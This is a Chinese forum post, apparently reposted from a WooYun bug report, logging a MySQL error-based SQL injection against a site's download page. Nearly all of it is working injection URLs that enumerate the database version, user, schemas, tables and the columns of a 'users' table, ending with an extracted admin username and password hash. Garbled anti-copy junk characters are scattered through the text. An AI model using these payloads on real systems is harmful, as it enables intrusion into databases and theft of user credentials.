php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666

之前想找个测试 没想到这有 可以测试下做个记录而已
4 |. Z9 H. X/ z- m& K
9 q3 r/ v/ M9 w& V/ k' F2 ^; Nhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

8 [6 h- O8 g: o# V  g7 ^, W/data0/htdocs/leqi_new/app/myapp.php

或者

0 w( C; K/ H1 \/ `! \) H$ q- j/**********version()**********/ 5.1.49-log
' D2 x- ?8 x" \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********user()**********/  
6 q. V* O! Y: X  L$ B, ^http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

# O* f# O* Y. Y2 W9 C/**********database()**********/  leqi
' i+ G) G( s+ q1 R  Ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! j/ A  p& t4 }$ {$ ^
* |4 p4 H$ N& R; X" F. U! _1 Q7 k/**********limit依次递归爆库**********/
3 x. `' Q+ K$ l0 T  f+ ?http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 ^, u/ ]) Q" N  [( Y5 Iinformation_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( O$ s) J, g8 [# s1 D. cleqi
) |5 L0 M7 F0 y3 m" ]http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
! B; K* D- u# o- @- Q# A9 Y3 ]& ktest

+ R" ^& p  D' c( r  F3 k$ D  f8 s0 O/**********limit依次递归爆表名**********/
# H# U, ^4 t8 F+ ^* h, i5 ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
% E! _$ ]4 n8 j6 m: ^# G8 [. _2 \
- m4 P" h! I  N& m0 b1 b/**********limit依次递归爆字段名**********/
  l3 i& a  e0 ^8 [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
; F% ^8 w- E: M' G3 h/wapc/5000_0005_003
- I+ |2 m0 m# \$ f: F11 341 351 361
/ ?% Q% ?$ ~$ U# |6 o9 |( R: u& B% X/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
( X/ F# m( M' G7 O* f  radmin
6 m, g; H# p4 u5 I. zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
. k! w) R# F. J2 k9 W/ C  \6a8b4574ca231eb8bd52764d4978ffcd
, F9 E5 o3 {# w! j+ a7 U5 _

: z8 Z0 ]5 c* _$ l: b